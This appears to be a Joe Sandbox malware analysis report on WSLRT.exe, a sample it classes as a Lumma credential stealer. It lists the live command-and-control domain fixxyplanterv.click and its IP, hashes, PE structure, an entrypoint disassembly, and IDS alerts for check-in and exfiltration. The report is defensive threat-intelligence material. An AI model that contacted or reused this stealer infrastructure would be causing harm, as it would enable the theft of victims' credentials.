https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	dxdiag.exe, 00000001.00000003.1905255414.0000000003443000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	dxdiag.exe, 00000001.00000003.1879375132.000000000578F000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1880103801.0000000005778000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	dxdiag.exe, 00000001.00000003.1891642214.00000000057B5000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1881150545.00000000057B5000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1880966948.00000000057B5000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1880877586.00000000057BC000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1891476501.00000000057B5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fixxyplanterv.click/jh	dxdiag.exe, 00000001.00000003.1922204202.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921681897.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921228817.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1922641260.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921443405.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1922521115.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921325690.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1922340035.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1922026178.0000000003450000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fixxyplanterv.click/apiM	dxdiag.exe, 00000001.00000002.1972096748.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1971023716.00000000033E2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	dxdiag.exe, 00000001.00000003.1905255414.0000000003443000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	dxdiag.exe, 00000001.00000003.1903490936.0000000005786000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	dxdiag.exe, 00000001.00000003.1903490936.0000000005786000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	dxdiag.exe, 00000001.00000003.1880966948.0000000005790000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	dxdiag.exe, 00000001.00000003.1879375132.000000000578F000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1880103801.0000000005778000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fixxyplanterv.click/apiP	dxdiag.exe, 00000001.00000002.1972096748.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1971023716.00000000033E2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	dxdiag.exe, 00000001.00000003.1904583976.000000000588B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	dxdiag.exe, 00000001.00000003.1905255414.0000000003443000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	dxdiag.exe, 00000001.00000003.1905255414.0000000003443000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	dxdiag.exe, 00000001.00000003.1879375132.000000000578F000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1880103801.0000000005778000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fixxyplanterv.click/	dxdiag.exe, 00000001.00000003.1935607021.000000000346A000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1922340035.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1922026178.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1923981712.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1925748358.000000000346A000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1903451242.0000000003450000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fixxyplanterv.click/la	dxdiag.exe, 00000001.00000003.1921681897.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921228817.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921443405.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921325690.0000000003450000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	dxdiag.exe, 00000001.00000003.1879375132.000000000578F000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1880103801.0000000005778000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	dxdiag.exe, 00000001.00000003.1903490936.0000000005786000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	dxdiag.exe, 00000001.00000003.1905255414.0000000003443000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	dxdiag.exe, 00000001.00000003.1903490936.0000000005786000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fixxyplanterv.click/api?4	dxdiag.exe, 00000001.00000003.1891726210.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1891776601.0000000003458000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	dxdiag.exe, 00000001.00000003.1891642214.00000000057B5000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1881150545.00000000057B5000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1880966948.00000000057B5000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1880877586.00000000057BC000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1891476501.00000000057B5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	dxdiag.exe, 00000001.00000003.1879375132.000000000578F000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1880103801.0000000005778000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	dxdiag.exe, 00000001.00000003.1904583976.000000000588B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fixxyplanterv.click/pi	dxdiag.exe, 00000001.00000003.1902872299.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000002.1972698531.000000000346D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1945462618.000000000346A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fixxyplanterv.click/api&3	dxdiag.exe, 00000001.00000003.1922204202.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921681897.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921228817.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921443405.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921325690.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1922340035.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1922026178.0000000003450000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	dxdiag.exe, 00000001.00000003.1879375132.000000000578F000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1880103801.0000000005778000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fixxyplanterv.click:443/api	dxdiag.exe, 00000001.00000002.1972096748.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1971023716.00000000033E2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	dxdiag.exe, 00000001.00000003.1905255414.0000000003443000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.microsof	dxdiag.exe, 00000001.00000003.1880877586.00000000057BE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	dxdiag.exe, 00000001.00000003.1903490936.0000000005786000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fixxyplanterv.click/:	dxdiag.exe, 00000001.00000003.1935790375.000000000346F000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1939532652.000000000346A000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1939670222.000000000346F000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000002.1972698531.0000000003470000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1945462618.000000000346A000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1961486214.000000000346F000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1935607021.000000000346A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fixxyplanterv.click/C3	dxdiag.exe, 00000001.00000003.1891726210.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1891776601.0000000003458000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fixxyplanterv.click/ob	dxdiag.exe, 00000001.00000003.1924594667.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1925146540.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1924702653.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1922204202.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921681897.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1923050702.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921228817.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1922641260.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1923396438.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1923653553.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1923498896.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1924143105.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921443405.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1922521115.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1923232078.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1924823683.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1922785286.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921325690.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1922340035.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1922026178.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1923981712.0000000003450000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	dxdiag.exe, 00000001.00000003.1880966948.0000000005790000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	dxdiag.exe, 00000001.00000003.1879375132.000000000578F000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1880103801.0000000005778000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.134.197	fixxyplanterv.click	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589839
Start date and time:	2025-01-13 08:33:17 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	WSLRT.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/0@1/1
EGA Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.253.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target WSLRT.exe, PID 6800 because there are no executed function
Execution Graph export aborted for target dxdiag.exe, PID 2596 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:34:28	API Interceptor	8x Sleep call for process: dxdiag.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.134.197	msit.msi	Get hash	malicious	LummaC Stealer	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fixxyplanterv.click	msit.msi	Get hash	malicious	LummaC Stealer	Browse	172.67.134.197
fixxyplanterv.click	schost.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.6.116

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	msit.msi	Get hash	malicious	LummaC Stealer	Browse	172.67.134.197
	Shipping Docs Waybill No 2009 xxxx 351.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	trow.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://encryption-deme-group.lomiraxen.ru/PdoodjcL/#Mvercauteren.william@deme-group.com	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://link.mail.beehiiv.com/ss/c/u001.dSnm3kaGd0BkNqLYPjeMfxWXllAYaBQ5sAn4OVD0j89GQGPZtwQlLugE_8c0wQMKfkpy5_wJ66BvE1Ognfzf5MlQMAeZ1qYs5mgwUBu3TAc6279Q43ISHz-HkVRC08yeDA4QvKWsqLTI1us9a0eXx18qeAibsZhjMMPvES-iG2zoVABKcwKIVWyx95VTVcFMSh6AEN3OCUfP_rXFvjKRbIPMuhn_dqYr8yUBKJvhhlJR9FhTpZPAULxzMbsYWp8k/4cu/JfECY1HwRl-ipvrNOktVcw/h23/h001.ibQl2N4tDD79TTzErix_sFWEGLTTuM6dTVMrTg3y5Dk	Get hash	malicious	Unknown	Browse	172.67.40.50
	g3.elf	Get hash	malicious	Unknown	Browse	1.1.1.1
	g5.elf	Get hash	malicious	Unknown	Browse	1.1.1.1
	rCHARTERREQUEST.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	https://app-nadexlxogi.webflow.io/	Get hash	malicious	Unknown	Browse	172.64.151.8
	https://postaboutx.com/	Get hash	malicious	Unknown	Browse	172.67.134.64

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	msit.msi	Get hash	malicious	LummaC Stealer	Browse	172.67.134.197
	PCB - Lyell Highway Upgrades Queenstown to Strahan - March 2021.XLSM	Get hash	malicious	Unknown	Browse	172.67.134.197
	PCB - Lyell Highway Upgrades Queenstown to Strahan - March 2021.XLSM	Get hash	malicious	Unknown	Browse	172.67.134.197
	L7GNkeVm5e.exe	Get hash	malicious	LummaC	Browse	172.67.134.197
	sE5IdDeTp2.exe	Get hash	malicious	Unknown	Browse	172.67.134.197
	NDWffRLk7z.exe	Get hash	malicious	LummaC	Browse	172.67.134.197
	g3toRYa6JE.exe	Get hash	malicious	LummaC	Browse	172.67.134.197
	lBb4XI4eGD.exe	Get hash	malicious	LummaC	Browse	172.67.134.197
	UWYXurYZ2x.exe	Get hash	malicious	LummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty Stealer	Browse	172.67.134.197
	sE5IdDeTp2.exe	Get hash	malicious	Unknown	Browse	172.67.134.197

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.7830674350470055
TrID:	Win64 Executable GUI (202006/5) 91.80% Win64 Executable (generic) (12005/4) 5.46% Clipper DOS Executable (2020/12) 0.92% Generic Win/DOS Executable (2004/3) 0.91% DOS Executable Generic (2002/1) 0.91%
File name:	WSLRT.exe
File size:	12'697'600 bytes
MD5:	7dadbf556492f9de788752000420c6f6
SHA1:	1ba1474fa22d88e4bd3300a3ad1abf2a6a422fa8
SHA256:	f5ce9b8329c08e9c5351319073a9fac32d2e6ea7ad7d510bf5a61c9d341de7f2
SHA512:	100f29cfafac9e741f95dcb7cfdd10b7e7a632418b336704ba5c26289ddcf485f68dc6aa02739bb0f4ac8a3a6505ebba7436196462b0f9fc1f1e3a35c170cf36
SSDEEP:	196608:MH2/kcOKvhKUPgOuueBA8i0L6md9OSdNmplVhBYeVmtKBcE0+:N/kcOKsUPluN8MtOSEDhgC0+
TLSH:	F8D6E118BE77E9C9F47ED032C41516334EB1951D4626DEFA32E60B98EE0B0626FC6274
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....vXg.........."......D...x.................@.............................P............`........................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x14007e1d8
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x675876C3 [Tue Dec 10 17:13:39 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	7bb4e8cef6a9f350a8f5dc71e7b3773c

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F44B12E1AB0h
dec eax
add esp, 28h
jmp 00007F44B12E191Fh
int3
int3
dec eax
mov dword ptr [esp+18h], ebx
push ebp
dec eax
mov ebp, esp
dec eax
sub esp, 30h
dec eax
mov eax, dword ptr [00B527C0h]
dec eax
mov ebx, 2DDFA232h
cdq
sub eax, dword ptr [eax]
add byte ptr [eax+3Bh], cl
ret
jne 00007F44B12E1B16h
dec eax
and dword ptr [ebp+10h], 00000000h
dec eax
lea ecx, dword ptr [ebp+10h]
call dword ptr [00A1377Ah]
dec eax
mov eax, dword ptr [ebp+10h]
dec eax
mov dword ptr [ebp-10h], eax
call dword ptr [00A136FCh]
mov eax, eax
dec eax
xor dword ptr [ebp-10h], eax
call dword ptr [00A136E8h]
mov eax, eax
dec eax
lea ecx, dword ptr [ebp+18h]
dec eax
xor dword ptr [ebp-10h], eax
call dword ptr [00A137E0h]
mov eax, dword ptr [ebp+18h]
dec eax
lea ecx, dword ptr [ebp-10h]
dec eax
shl eax, 20h
dec eax
xor eax, dword ptr [ebp+18h]
dec eax
xor eax, dword ptr [ebp-10h]
dec eax
xor eax, ecx
dec eax
mov ecx, FFFFFFFFh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa91588	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xbda000	0x1b4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0xbd4000	0x2694	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xbdb000	0x493b4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xa90bb0	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa87d40	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xa91850	0x2a0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x94386	0x94400	58dc89d5942396d2fb07a3aae556552b	False	0.5879449699620574	data	6.955121861927559	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x96000	0x9ff7dc	0x9ff800	84946fa80dc136dc6d332d3f71ba7b1b	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa96000	0x13d270	0x13ba00	b65e0af8c4910b0a11353dbdbad53e73	False	0.2597021967821782	OpenPGP Public Key	4.9045040045973245	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0xbd4000	0x2694	0x2800	27214f25b863fb8ba73daf6d544a8766	False	0.4875	data	5.666371736680218	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.fptable	0xbd7000	0x100	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0xbd8000	0x9	0x200	1f354d76203061bfdd5a53dae48d5435	False	0.033203125	data	0.020393135236084953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
_RDATA	0xbd9000	0x280	0x400	42627bf1df88622aca481310d8cbc1ff	False	0.287109375	data	3.183167776444881	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xbda000	0x1b4	0x200	2e77bf60acacb601d81615a014e963b7	False	0.4921875	data	5.109292165198166	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xbdb000	0x493b4	0x49400	2ac66bb1c87141a4abb770c83cdca551	False	0.014698432167235495	data	5.429112974746318	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0xbda058	0x15b	ASCII text, with CRLF line terminators	English	United States	0.5446685878962536

Imports

DLL

Import

KERNEL32.dll

AcquireSRWLockExclusive, CloseHandle, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlsAlloc, FlsFree, FlsGetValue, FlsSetValue, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReleaseSRWLockExclusive, RtlCaptureContext, RtlLookupFunctionEntry, RtlPcToFileHeader, RtlUnwindEx, RtlVirtualUnwind, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, VirtualProtect, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-13T08:34:28.401455+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49730	172.67.134.197	443	TCP
2025-01-13T08:34:28.885127+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49730	172.67.134.197	443	TCP
2025-01-13T08:34:28.885127+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49730	172.67.134.197	443	TCP
2025-01-13T08:34:29.413014+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49731	172.67.134.197	443	TCP
2025-01-13T08:34:29.889364+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49731	172.67.134.197	443	TCP
2025-01-13T08:34:29.889364+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49731	172.67.134.197	443	TCP
2025-01-13T08:34:30.770894+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	172.67.134.197	443	TCP
2025-01-13T08:34:31.924788+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49733	172.67.134.197	443	TCP
2025-01-13T08:34:32.434366+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49733	172.67.134.197	443	TCP
2025-01-13T08:34:33.330422+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49734	172.67.134.197	443	TCP
2025-01-13T08:34:35.272248+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49735	172.67.134.197	443	TCP
2025-01-13T08:34:36.681814+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49736	172.67.134.197	443	TCP
2025-01-13T08:34:38.800815+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49737	172.67.134.197	443	TCP
